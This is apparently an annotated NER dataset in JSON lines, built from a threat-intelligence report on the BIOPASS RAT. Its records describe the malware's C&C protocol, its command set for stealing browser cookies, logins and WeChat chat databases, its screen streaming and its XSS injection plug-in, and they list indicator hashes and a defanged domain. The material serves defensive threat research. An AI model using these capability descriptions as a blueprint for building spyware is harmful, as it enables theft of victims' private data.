China.","entities":[{"id":48364,"label":"location","start_offset":123,"end_offset":128},{"id":48365,"label":"SOFTWARE","start_offset":109,"end_offset":119},{"id":48366,"label":"SOFTWARE","start_offset":58,"end_offset":82}],"relations":[],"Comments":[]} {"id":3246,"text":"If the backdoor finds that the file “debug” present inside the root directory, it will wait for 130 seconds and then continue with execution. Figure 16.","entities":[],"relations":[],"Comments":[]} {"id":3247,"text":"The script used to check the username and debug mode ","entities":[],"relations":[],"Comments":[]} {"id":3248,"text":"Next, the backdoor will try to read the file “bps.key” inside the root directory.","entities":[{"id":48367,"label":"FILEPATH","start_offset":46,"end_offset":53}],"relations":[],"Comments":[]} {"id":3249,"text":"This file contains the victim ID assigned by the command-and-control (C&C) server.","entities":[],"relations":[],"Comments":[]} {"id":3250,"text":"If the file hasn’t been created, it will set the victim ID to a null value until the C&C server assigns it.","entities":[],"relations":[],"Comments":[]} {"id":3251,"text":"At the end of initialization, it collects the information of the victim’s system and initializes values in the global config variable that contains important configuration information.","entities":[],"relations":[],"Comments":[]} {"id":3252,"text":"This includes the backdoor version (we observed V2 and V3), access keys, endpoint address, the bucket name for Alibaba Cloud OSS, and a URL for downloading the utility sc.exe that is used for taking screenshots.","entities":[{"id":48369,"label":"FILEPATH","start_offset":168,"end_offset":174},{"id":48368,"label":"Infrastucture","start_offset":111,"end_offset":128}],"relations":[],"Comments":[]} {"id":3253,"text":" Figure 17.","entities":[],"relations":[],"Comments":[]} {"id":3254,"text":"The BPS backdoor global configuration variable The backdoor communicates with the C&C server using the Socket.io protocol.","entities":[{"id":48370,"label":"malware","start_offset":4,"end_offset":16}],"relations":[],"Comments":[]} {"id":3255,"text":"The C&C communication is encrypted with AES ECB algorithm using a hard-coded password, ZLIB compression, and base85 encoding.","entities":[],"relations":[],"Comments":[]} {"id":3256,"text":"Figures 18 and 19 show how the malware sends the “join” event to initialize C&C communication and attach the victim’s encrypted data.","entities":[],"relations":[],"Comments":[]} {"id":3257,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} {"id":3258,"text":"Encoded “join” event sent to the C&C server Figure 19.","entities":[],"relations":[],"Comments":[]} {"id":3259,"text":"Decoded “join” event sent to the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3260,"text":"It’s important to note that attributes like IP address, computer and username, architecture, installed antivirus, and geolocation are included.","entities":[],"relations":[],"Comments":[]} {"id":3261,"text":" The BIOPASS RAT malware registers three custom Socket.io event handlers:","entities":[{"id":9917,"label":"malware","start_offset":8,"end_offset":19}],"relations":[],"Comments":[]} {"id":3262,"text":"1. The “notice” handler is used for checking the connection with the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3263,"text":"The backdoor regularly sends a “notice” event to the server and records the timestamp if it also receives a “notice” event as the response.","entities":[],"relations":[],"Comments":[]} {"id":3264,"text":"If the malware doesn’t receive any “notice” event within a hard-coded threshold period, it will restart.","entities":[],"relations":[],"Comments":[]} {"id":3265,"text":"2. The “set key” handler is used for accepting the victim ID, a random string with six characters, assigned by the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3266,"text":"It will be attached in each of commands sent from the server and will also be used as the folder name on a cloud storage service to save the stolen data.","entities":[],"relations":[],"Comments":[]} {"id":3267,"text":"The victim ID will be stored in the “bps.key” file.","entities":[{"id":48371,"label":"FILEPATH","start_offset":37,"end_offset":44}],"relations":[],"Comments":[]} {"id":3268,"text":" 3. The “accept task” handler is the main handler used to process the command sent from the C&C server and to return the execution result.","entities":[],"relations":[],"Comments":[]} {"id":3269,"text":"We share more details of each command in the next section.","entities":[],"relations":[],"Comments":[]} {"id":3270,"text":"After the malware joins the C&C server, the server will assign a victim ID with “set key” event and send multiple “accept task” events with the commands “ScreenShot”, “SnsInfo”, “PackingTelegram”, “GetBrowsersCookies”, “GetBrowsersLogins”, “GetBrowsersHistories”, and “GetBrowsersBookmarks” to instruct the malware to collect private data from the victim.","entities":[],"relations":[],"Comments":[]} {"id":3271,"text":"A closer look at the BIOPASS RAT commands","entities":[{"id":9935,"label":"malware","start_offset":21,"end_offset":32}],"relations":[],"Comments":[]} {"id":3272,"text":"The BIOPASS RAT malware implements multiple commands, most of which are self-explanatory.","entities":[{"id":9936,"label":"malware","start_offset":4,"end_offset":15}],"relations":[],"Comments":[]} {"id":3273,"text":"A summary of commands is listed in Table 2, while additional details of some commands are explained in the following section.","entities":[],"relations":[],"Comments":[]} {"id":3274,"text":" Command Behavior Compress_Files Compresses specified files or directories to a ZIP archive Decompress_File Extracts files from a specified ZIP archive AutoRun Creates a scheduled task for persistence CloseEverything Kills the Everything process with the command “TASKKILL \/F \/IM Everything.exe” OpenEverything Downloads and runs Everything from voidtools CloseFFmpegLive Kills the FFmpeg process with the command “TASKKILL \/F \/IM ffmpeg.exe” OpenFFmpegLive Downloads and runs FFmpeg (for screen video capture) DeleteFile Deletes files or directories at specified locations CreateDir Creates a directory at a specified location ShowFiles Gets the disk partition or lists a specified directory with detailed information, including file name, file path, size, create time, and time of modification Download_File Downloads a URL and saves the file to a specified location Upload_File Uploads the victim’s files to cloud storage uUninstall Kills the BIOPASS RAT process and deletes installed files. CloseObsLive Kills the OBS process with command “TASKKILL \/F \/IM obs64.exe” Open_Obs_Live Downloads OBS Studio and starts live streaming ProcessList Lists processes on the victim’s environment and their process identifier (PID) KillProcess Kills the process specified by PID with the TASKKILL command ScreenShot Takes a screenshot and uploads it to cloud storage Shell Executes commands or scripts (subcommands with prefixes subprocess, python, noreturn, getversion, restart) SnsInfo Lists QQ, WeChat, and Aliwangwang directories InstallTcpdump Downloads and installs the tcpdump tool PackingTelegram Compresses and uploads Telegram's “tdata” directory to cloud storage CloseProxy Kills frpc process with command “TASKKILL \/F \/IM frpc.exe” OpenProxy Downloads and installs the frp proxy client in the “%PUBLIC%” folder OpenVnc Downloads and installs jsmpeg-vnc tool in the “%PUBLIC%\/vnc\/” folder CloseVnc Kills the VNC process with the command “TASKKILL \/F \/IM vdwm.exe” GetBrowsersCookies Decrypts the cookie file of the browser and uploads it to cloud storage GetBrowsersLogins Decrypts the login file of the browser and uploads it to cloud storage GetBrowsersHistories Uploads the history file of the browser to cloud storage GetBrowsersBookmarks Uploads the bookmark file of the browser to cloud storage Table 2.","entities":[{"id":48372,"label":"FILEPATH","start_offset":289,"end_offset":303}],"relations":[],"Comments":[{"id":1,"comment":"exclude"}]} {"id":3275,"text":"BIOPASS RAT commands OpenEverything The malware downloads “Everything” files if the “Everything” binary is not found in the “%TEMP%” folder.","entities":[{"id":48373,"label":"FILEPATH","start_offset":128,"end_offset":134},{"id":9976,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3276,"text":"It then changes the port number of the HTTP server inside the configuration file and starts the Everything process, which will open an HTTP server to allow the threat actor to access the file system of the victim.","entities":[],"relations":[],"Comments":[]} {"id":3277,"text":"OpenFFmpegLive The malware downloads FFmpeg files if they are not found on the victim’s machine.","entities":[{"id":48374,"label":"malware","start_offset":0,"end_offset":14},{"id":48375,"label":"SOFTWARE","start_offset":38,"end_offset":44}],"relations":[],"Comments":[]} {"id":3278,"text":"Next, it starts the FFmpeg process to monitor the victim’s desktop via RTMP live streaming to the cloud.","entities":[{"id":48376,"label":"SOFTWARE","start_offset":20,"end_offset":26}],"relations":[],"Comments":[]} {"id":3279,"text":"The malicious actor can then connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} {"id":3280,"text":"Open_Obs_Live","entities":[],"relations":[],"Comments":[]} {"id":3281,"text":" The malware downloads OBS Studio files if the OBS folder and config file are not found in the root directory.","entities":[{"id":48378,"label":"malware","start_offset":5,"end_offset":12},{"id":48377,"label":"SOFTWARE","start_offset":23,"end_offset":33}],"relations":[{"id":408,"from_id":48378,"to_id":48377,"type":"downloads"}],"Comments":[]} {"id":3282,"text":"It writes the basic config and RTMP config of OBS and then starts the OBS process to monitor the victim’s desktop using RTMP live streaming to the cloud.","entities":[],"relations":[],"Comments":[]} {"id":3283,"text":"The malicious actor can connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} {"id":3284,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} {"id":3285,"text":"The script used to download OBS Studio, prepare the configuration, and start the process ScreenShot","entities":[{"id":48379,"label":"SOFTWARE","start_offset":28,"end_offset":38}],"relations":[],"Comments":[]} {"id":3286,"text":"The malware downloads the screenshot-cmd tool if it is not found in the root directory.","entities":[],"relations":[],"Comments":[]} {"id":3287,"text":"It takes a screenshot of the victim’s screen with the tool and saves it as a PNG file with a random number as the file name.","entities":[],"relations":[],"Comments":[]} {"id":3288,"text":" The malware will then upload the screenshot files to cloud storage.","entities":[],"relations":[],"Comments":[]} {"id":3289,"text":"Shell","entities":[],"relations":[],"Comments":[]} {"id":3290,"text":"The malware uses a number of methods to execute the shell command or script.","entities":[],"relations":[],"Comments":[]} {"id":3291,"text":"The “Shell” command instructs the malware to execute a command using the Python function “win32api.ShellExecute” and to return the result to a C&C server, applying a 60-second timeout for command execution.","entities":[{"id":48380,"label":"SOFTWARE","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} {"id":3292,"text":"If the command has one of the following prefixes, it will perform a specific behavior:","entities":[],"relations":[],"Comments":[]} {"id":3293,"text":"1. “subprocess”: executes a system command using the Python function “subprocess.Popen”.","entities":[{"id":48381,"label":"SOFTWARE","start_offset":58,"end_offset":64}],"relations":[],"Comments":[]} {"id":3294,"text":"2. “python”: executes a Python script delivered with the command.","entities":[{"id":48382,"label":"SOFTWARE","start_offset":29,"end_offset":35}],"relations":[],"Comments":[]} {"id":3295,"text":"3. “noreturn”: executes a system command using the Python function “win32api.ShellExecute” without waiting for the result.","entities":[{"id":48383,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} {"id":3296,"text":"4. “getversion”: returns the string “20200202”.","entities":[],"relations":[],"Comments":[]} {"id":3297,"text":"5. “restart”: kills the process itself and restarts it via scheduled malicious tasks. SnsInfo","entities":[],"relations":[],"Comments":[]} {"id":3298,"text":"The command will list the installation directory of several popular instant messaging applications including WeChat, QQ, and Aliwangwang and return this information to the C&C server.","entities":[{"id":48384,"label":"SOFTWARE","start_offset":109,"end_offset":115},{"id":48386,"label":"SOFTWARE","start_offset":125,"end_offset":136},{"id":48385,"label":"SOFTWARE","start_offset":117,"end_offset":119}],"relations":[],"Comments":[]} {"id":3299,"text":"Figures 21 and 22 show the result of running “SnsInfo” command to enumerate messengers.","entities":[],"relations":[],"Comments":[]} {"id":3300,"text":" Figure 21.","entities":[],"relations":[],"Comments":[]} {"id":3301,"text":"Encoded SUBMIT RESULT command sent to C&C server Figure 22. Decoded SUBMIT RESULT command sent to C&C server None of the Chinese messenger applications has been installed on our testing machine, which explains the result seen in the images.","entities":[],"relations":[],"Comments":[]} {"id":3302,"text":" GetBrowsersCookies This command is designed to steal cookie information from browsers.","entities":[],"relations":[],"Comments":[]} {"id":3303,"text":"It will read the “Local State” file to grab the AES secret key of Google Chrome-based browsers.","entities":[{"id":48387,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} {"id":3304,"text":"Depending on the different argument “type” delivered with the command, it performs different behaviors.","entities":[],"relations":[],"Comments":[]} {"id":3305,"text":"If the value of the “type” argument is “Chrome”, it will use the AES secret key or DPAPI (for Chrome versions before 80) to decrypt the cookie file.","entities":[{"id":48388,"label":"SOFTWARE","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} {"id":3306,"text":"The decrypted result will be sent to the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3307,"text":" Figure 23.","entities":[],"relations":[],"Comments":[]} {"id":3308,"text":"The script to decrypt Chrome’s file with AES or DPAPI decryption If the value of the “type” argument is “File”","entities":[{"id":48389,"label":"SOFTWARE","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} {"id":3309,"text":", it will directly upload the cookie file to cloud storage.","entities":[],"relations":[],"Comments":[]} {"id":3310,"text":"The command that we received showed that the targeted browsers include Google Chrome, Microsoft Edge Beta, 360 Chrome, QQ Browser, 2345 Explorer, Sogou Explorer, and 360 Safe Browser.","entities":[{"id":48390,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":48394,"label":"SOFTWARE","start_offset":131,"end_offset":144},{"id":48395,"label":"SOFTWARE","start_offset":146,"end_offset":160},{"id":48396,"label":"SOFTWARE","start_offset":166,"end_offset":182},{"id":48391,"label":"SOFTWARE","start_offset":86,"end_offset":105},{"id":48392,"label":"SOFTWARE","start_offset":107,"end_offset":117},{"id":48393,"label":"SOFTWARE","start_offset":119,"end_offset":129}],"relations":[],"Comments":[]} {"id":3311,"text":" Figure 24.","entities":[],"relations":[],"Comments":[]} {"id":3312,"text":"Code showing the command to target Sogou Explorer GetBrowsersLogins","entities":[{"id":48397,"label":"SOFTWARE","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} {"id":3313,"text":"This command has a nearly identical function to “GetBrowsersCookies”, although it targets a browser’s “Login Data” files instead.","entities":[],"relations":[],"Comments":[]} {"id":3314,"text":"Additional Findings on BIOPASS RAT ","entities":[{"id":10040,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} {"id":3315,"text":"Although these are not implemented inside the BIOPASS RAT malware, we have observed two additional plug-ins that are written in Python (“getwechatdb” and “xss_spoof”) and were deployed by the threat actor to a victim who had been infected with Cobalt Strike.","entities":[{"id":48398,"label":"malware","start_offset":46,"end_offset":57},{"id":48399,"label":"SOFTWARE","start_offset":128,"end_offset":134},{"id":48400,"label":"tools","start_offset":244,"end_offset":257}],"relations":[{"id":409,"from_id":48398,"to_id":48400,"type":"uses"}],"Comments":[]} {"id":3316,"text":"The script “getwechatdb” is used for exfiltrating the chat history from the WeChat Windows client.","entities":[{"id":48401,"label":"SOFTWARE","start_offset":76,"end_offset":97}],"relations":[],"Comments":[]} {"id":3317,"text":"The script will detect the version of the installed WeChat client and grab the decryption key and the user ID.","entities":[{"id":48402,"label":"SOFTWARE","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} {"id":3318,"text":"The predefined list of offsets is used to locate where the decryption key and the user ID are embedded.","entities":[],"relations":[],"Comments":[]} {"id":3319,"text":"The list supports 36 different versions of memory offsets for the message client.","entities":[],"relations":[],"Comments":[]} {"id":3320,"text":" The script will then upload database files inside the WeChat folder including “MicroMsg.db” to cloud storage.","entities":[{"id":48403,"label":"SOFTWARE","start_offset":55,"end_offset":61},{"id":48404,"label":"FILEPATH","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} {"id":3321,"text":"These database files are used for saving the chat history.","entities":[],"relations":[],"Comments":[]} {"id":3322,"text":"Finally, the script will print out the client ID and the decryption key that allows the malicious actors to decrypt the stolen database files of the chat history.","entities":[],"relations":[],"Comments":[]} {"id":3323,"text":" Figure 25.","entities":[],"relations":[],"Comments":[]} {"id":3324,"text":"A predefined list of memory offset intended to grab information from different versions of WeChat Figure 26.","entities":[{"id":48405,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} {"id":3325,"text":"The script used to exfiltrate WeChat chat database files The other plug-in, “xss_spoof”, is an archive that contains multiple Python scripts.","entities":[{"id":48406,"label":"SOFTWARE","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} {"id":3326,"text":"The scripts are designed for web server infection via a cross-site scripting (XSS) attack.","entities":[{"id":48407,"label":"attack-pattern","start_offset":56,"end_offset":89}],"relations":[],"Comments":[]} {"id":3327,"text":"This plug-in can inject malicious scripts into the response of the victim’s web server by leveraging the WinDivert package, which is used to sniff and manipulate the network traffic on Windows.","entities":[{"id":48408,"label":"SOFTWARE","start_offset":105,"end_offset":114},{"id":48409,"label":"SOFTWARE","start_offset":185,"end_offset":192}],"relations":[],"Comments":[]} {"id":3328,"text":"The scripts intercept HTTP GET requests that are sent to port 80.","entities":[],"relations":[],"Comments":[]} {"id":3329,"text":"An “ignore” list is used to filter the file extensions of URLs to avoid manipulating resources that are not JavaScript or HTML.","entities":[],"relations":[],"Comments":[]} {"id":3330,"text":"The script then modifies the original JavaScript or HTML content and delivers it to website visitors.","entities":[],"relations":[],"Comments":[]} {"id":3331,"text":" Figure 27.","entities":[],"relations":[],"Comments":[]} {"id":3332,"text":"The JavaScript payload used to replace the original script of compromised websites The delivered script is almost the same as the malicious script previously discussed in the section on the watering hole attack.","entities":[{"id":48410,"label":"attack-pattern","start_offset":194,"end_offset":214}],"relations":[],"Comments":[]} {"id":3333,"text":"The script performs checks by scanning localhost to determine if the machine is infected by BIOPASS RAT while showing the fake updated webpages.","entities":[{"id":10089,"label":"malware","start_offset":92,"end_offset":103}],"relations":[],"Comments":[]} {"id":3334,"text":"It is likely that the malicious actors compromised the web servers first and then ran “xss_spoof” for propagation.","entities":[],"relations":[],"Comments":[]} {"id":3335,"text":" Figure 28.","entities":[],"relations":[],"Comments":[]} {"id":3336,"text":"The main script used to manipulate traffic with WinDivert Potential links with the Winnti group","entities":[{"id":48944,"label":"threat-actor","start_offset":87,"end_offset":99},{"id":48943,"label":"tools","start_offset":48,"end_offset":57}],"relations":[{"id":505,"from_id":48944,"to_id":48943,"type":"uses"}],"Comments":[]} {"id":3337,"text":"We have found several connections between BIOPASS RAT and the Winnti Group:","entities":[{"id":10096,"label":"malware","start_offset":42,"end_offset":53},{"id":48945,"label":"threat-actor","start_offset":62,"end_offset":74}],"relations":[{"id":506,"from_id":48945,"to_id":10096,"type":"uses"}],"Comments":[]} {"id":3338,"text":"1. We discovered that many BIOPASS RAT loader binaries were signed with two valid certificates.","entities":[{"id":48946,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} {"id":3339,"text":"However, these certificates are likely stolen from game studios from South Korea and Taiwan.","entities":[{"id":48947,"label":"location","start_offset":69,"end_offset":80},{"id":48948,"label":"location","start_offset":85,"end_offset":91}],"relations":[],"Comments":[]} {"id":3340,"text":"It is well known that the Winnti Group has previously used stolen certificates from game studios to sign its malware.","entities":[{"id":48950,"label":"attack-pattern","start_offset":59,"end_offset":78},{"id":48949,"label":"threat-actor","start_offset":26,"end_offset":38}],"relations":[{"id":507,"from_id":48949,"to_id":48950,"type":"uses"}],"Comments":[]} {"id":3341,"text":" Certificate Thumbprint Valid From Valid To EFB70718BC00393A01694F255A28E30E9D2142A4 12:00 a.m., Jan. 2, 2019 11:59 p.m., Mar. 2, 2021 8CE020AA874902C532B9911A4DCA8EFFA627DC80 12:00 a.m., Sept. 6, 2018 11:59 p.m., Oct. 5, 2021 Table 3.","entities":[{"id":48951,"label":"TIME","start_offset":89,"end_offset":114},{"id":48952,"label":"TIME","start_offset":116,"end_offset":140},{"id":48954,"label":"TIME","start_offset":211,"end_offset":235},{"id":48953,"label":"TIME","start_offset":184,"end_offset":209}],"relations":[],"Comments":[]} {"id":3342,"text":"Information from the stolen certificates 2. While checking the stolen certificates, we found a server-side variant of the Derusbi malware sample (e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783) that was signed with the same stolen certificate.","entities":[{"id":10119,"label":"SHA2","start_offset":153,"end_offset":217},{"id":48955,"label":"malware","start_offset":129,"end_offset":144}],"relations":[{"id":508,"from_id":10119,"to_id":48955,"type":"indicates"}],"Comments":[]} {"id":3343,"text":" Derusbi is known to be used by multiple advanced persistent threat (APT) groups.","entities":[{"id":10121,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":3344,"text":"The server-side variant has also been noted to be used as a malware loader by the Winnti Group.","entities":[{"id":48956,"label":"threat-actor","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} {"id":3345,"text":"3. We found an interesting Cobalt Strike loader (a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97) that embeds a URL that leads to the BIOPASS RAT loader.","entities":[{"id":10125,"label":"SHA2","start_offset":54,"end_offset":118},{"id":10126,"label":"malware","start_offset":156,"end_offset":167},{"id":48957,"label":"tools","start_offset":32,"end_offset":45}],"relations":[{"id":509,"from_id":10125,"to_id":48957,"type":"indicates"},{"id":510,"from_id":10125,"to_id":10126,"type":"drops"}],"Comments":[]} {"id":3346,"text":"However, the URL is unused and was likely left inside the loader as a mistake.","entities":[],"relations":[],"Comments":[]} {"id":3347,"text":"This file has also been mentioned in a recent report that connects it to an attack on a major certification authority (CA) in Mongolia.","entities":[{"id":48958,"label":"location","start_offset":126,"end_offset":134}],"relations":[],"Comments":[]} {"id":3348,"text":"The Cobalt Strike loader, which has a PDB string “C:\\Users\\test\\Desktop\\fishmaster\\x64\\Release\\fishmaster.pdb”, connects to the C&C server “download[.]google-images[.]ml”.","entities":[{"id":48959,"label":"tools","start_offset":4,"end_offset":17},{"id":48960,"label":"FILEPATH","start_offset":50,"end_offset":109},{"id":48961,"label":"DOMAIN","start_offset":140,"end_offset":169}],"relations":[{"id":511,"from_id":48960,"to_id":48959,"type":"indicates"},{"id":514,"from_id":48959,"to_id":48961,"type":"beacons-to"}],"Comments":[]} {"id":3349,"text":"The domains and the PDB string have been mentioned in a recent report and have been attributed to the Winnti Group.","entities":[{"id":48962,"label":"threat-actor","start_offset":102,"end_offset":114}],"relations":[],"Comments":[]} {"id":3350,"text":"While these connections allow us to link the malware to the Winnti Group, the different targets between BIOPASS RAT and the current operations by Winnti’s that we are tracking makes associating the two more difficult.","entities":[{"id":48963,"label":"threat-actor","start_offset":60,"end_offset":72},{"id":48964,"label":"malware","start_offset":104,"end_offset":115},{"id":48965,"label":"threat-actor","start_offset":146,"end_offset":152}],"relations":[{"id":515,"from_id":48963,"to_id":48964,"type":"uses"}],"Comments":[]} {"id":3351,"text":"BIOPASS RAT highlights the importance of downloading from trusted sources BIOPASS RAT is a sophisticated type of malware that is implemented as Python scripts.","entities":[{"id":48967,"label":"malware","start_offset":74,"end_offset":85},{"id":48966,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3352,"text":"It possesses many features, such as the ability to use scheduled tasks as a method of maintaining persistence in the infected system.","entities":[],"relations":[],"Comments":[]} {"id":3353,"text":" The malware abuses publicly available tools and cloud services for its malicious behavior.","entities":[],"relations":[],"Comments":[]} {"id":3354,"text":" Notably, a large number of features were implemented to target and steal the private data of popular web browsers and instant mes\\sengers that are primarily used in Mainland China.","entities":[{"id":48968,"label":"location","start_offset":166,"end_offset":180}],"relations":[],"Comments":[]} {"id":3355,"text":"Given that the malware loader was delivered as an executable disguised as a legitimate update installer on a compromised website, we advise users to be careful with regard to the applications that they download.","entities":[],"relations":[],"Comments":[]} {"id":3356,"text":"As much as possible, it is recommended to download apps only from trusted sources and official websites to avoid being compromised by attacks such as the one discussed here.","entities":[],"relations":[],"Comments":[]} {"id":3357,"text":"Organizations can also help protect their end users by implementing security solutions that provide a multilayered defense system that helps with detecting, scanning, and blocking malicious URLs.","entities":[],"relations":[],"Comments":[]} {"id":3358,"text":"Note that we’ve submitted an abuse report to Alibaba, but we have yet to receive feedback at the time of publication.","entities":[{"id":48969,"label":"identity","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} {"id":3359,"text":"Indicators of Compromise (IoCs) SHA256 Filename Note Analysis 84fbf74896d2a1b62d73b9a5d0be2f627d522fc811fe08044e5485492d2d4249 big.txt BIOPASS RAT Python Script (Version 3) TrojanSpy.Python.BIOPASS.A f3c96145c9d6972df265e12accfcd1588cee8af1b67093011e31b44d0200871f c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A 0f8a87ca5f94949904804442c1a0651f99ba17ecf989f46a3b2fde8de455c4a4 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A d8b1c4ad8f31c735c51cb24e9f767649f78ef5c571769fbaac9891c899c33444 c1222.txt BIOPASS RAT Python Script (C1222 module) ","entities":[{"id":10167,"label":"SHA1","start_offset":71,"end_offset":135},{"id":10168,"label":"malware","start_offset":146,"end_offset":157},{"id":10169,"label":"SHA1","start_offset":213,"end_offset":277},{"id":10170,"label":"malware","start_offset":290,"end_offset":301},{"id":10171,"label":"SHA2","start_offset":357,"end_offset":421},{"id":10172,"label":"malware","start_offset":434,"end_offset":445},{"id":10173,"label":"SHA2","start_offset":501,"end_offset":565},{"id":10174,"label":"malware","start_offset":578,"end_offset":589},{"id":48970,"label":"FILEPATH","start_offset":137,"end_offset":144},{"id":48972,"label":"FILEPATH","start_offset":279,"end_offset":288},{"id":48975,"label":"malware","start_offset":476,"end_offset":499},{"id":48976,"label":"FILEPATH","start_offset":567,"end_offset":576},{"id":48974,"label":"FILEPATH","start_offset":423,"end_offset":432},{"id":48971,"label":"malware","start_offset":185,"end_offset":211},{"id":48973,"label":"malware","start_offset":332,"end_offset":355}],"relations":[{"id":516,"from_id":10167,"to_id":10168,"type":"indicates"},{"id":517,"from_id":48970,"to_id":10168,"type":"indicates"},{"id":519,"from_id":48970,"to_id":10167,"type":"duplicate-of"},{"id":520,"from_id":10168,"to_id":48971,"type":"duplicate-of"},{"id":521,"from_id":10169,"to_id":10170,"type":"indicates"},{"id":522,"from_id":48972,"to_id":10170,"type":"indicates"},{"id":523,"from_id":48972,"to_id":10169,"type":"duplicate-of"},{"id":524,"from_id":48973,"to_id":10170,"type":"duplicate-of"},{"id":525,"from_id":10171,"to_id":10172,"type":"indicates"},{"id":526,"from_id":48974,"to_id":10172,"type":"indicates"},{"id":527,"from_id":48975,"to_id":10172,"type":"duplicate-of"},{"id":528,"from_id":48974,"to_id":10171,"type":"duplicate-of"},{"id":529,"from_id":10173,"to_id":10174,"type":"indicates"},{"id":530,"from_id":48976,"to_id":10174,"type":"indicates"},{"id":531,"from_id":48976,"to_id":10173,"type":"duplicate-of"}],"Comments":[]} {"id":3360,"text":"Trojan.","entities":[],"relations":[],"Comments":[]} {"id":3361,"text":"Python.BIOPASS.A ee4150f18ed826c032e7407468beea3b1f738ba80b75a6be21bb8d59ee345466","entities":[{"id":10175,"label":"SHA2","start_offset":18,"end_offset":82},{"id":48977,"label":"malware","start_offset":0,"end_offset":16}],"relations":[{"id":532,"from_id":10175,"to_id":48977,"type":"indicates"}],"Comments":[]} {"id":3362,"text":"c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10176,"label":"malware","start_offset":11,"end_offset":22},{"id":48978,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":533,"from_id":48978,"to_id":10176,"type":"indicates"}],"Comments":[]} {"id":3363,"text":".Python.BIOPASS.A 34be85754a84cc44e5bb752ee3a95e2832e7be1f611dd99e9a1233c812a6dad2 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10177,"label":"SHA2","start_offset":19,"end_offset":83},{"id":10178,"label":"malware","start_offset":96,"end_offset":107},{"id":48979,"label":"malware","start_offset":0,"end_offset":17},{"id":48980,"label":"FILEPATH","start_offset":85,"end_offset":94}],"relations":[{"id":534,"from_id":48979,"to_id":10178,"type":"duplicate-of"},{"id":535,"from_id":48980,"to_id":10177,"type":"duplicate-of"},{"id":536,"from_id":10177,"to_id":10178,"type":"indicates"},{"id":537,"from_id":48980,"to_id":10178,"type":"indicates"}],"Comments":[]} {"id":3364,"text":".Python.BIOPASS.A 30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10180,"label":"malware","start_offset":98,"end_offset":109},{"id":10179,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48981,"label":"malware","start_offset":1,"end_offset":17},{"id":48982,"label":"FILEPATH","start_offset":85,"end_offset":96}],"relations":[{"id":538,"from_id":48982,"to_id":10179,"type":"duplicate-of"},{"id":539,"from_id":10179,"to_id":10180,"type":"indicates"},{"id":540,"from_id":48982,"to_id":10180,"type":"indicates"},{"id":541,"from_id":48981,"to_id":10180,"type":"duplicate-of"}],"Comments":[]} {"id":3365,"text":".Python.BIOPASS.A f21decb19da8d8c07066a78839ffd8af6721b1f4323f10a1df030325a1a5e159 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module)","entities":[{"id":10182,"label":"malware","start_offset":98,"end_offset":109},{"id":10181,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48983,"label":"FILEPATH","start_offset":85,"end_offset":96},{"id":48984,"label":"malware","start_offset":1,"end_offset":17}],"relations":[{"id":542,"from_id":10181,"to_id":10182,"type":"indicates"},{"id":543,"from_id":48983,"to_id":10182,"type":"indicates"},{"id":544,"from_id":48983,"to_id":10181,"type":"duplicate-of"},{"id":545,"from_id":48984,"to_id":10182,"type":"duplicate-of"}],"Comments":[]} {"id":3366,"text":"Trojan.","entities":[],"relations":[],"Comments":[]} {"id":3367,"text":"Python.BIOPASS.A","entities":[{"id":48985,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":3368,"text":" 40ab025d455083500bfb0c7c64e78967d4d06f91580912dccf332498681ebaf6","entities":[{"id":10183,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3369,"text":"cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10184,"label":"malware","start_offset":13,"end_offset":24},{"id":48986,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[{"id":547,"from_id":48986,"to_id":10184,"type":"indicates"}],"Comments":[]} {"id":3370,"text":".Python.BIOPASS.A e479823aa41d3f6416233dba8e765cf2abaa38ad18328859a20b88df7f1d88d5 sc2.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A e567fd0f08fdafc5a89c9084373f3308ef464918ff7e4ecd7fb3135d777e946d 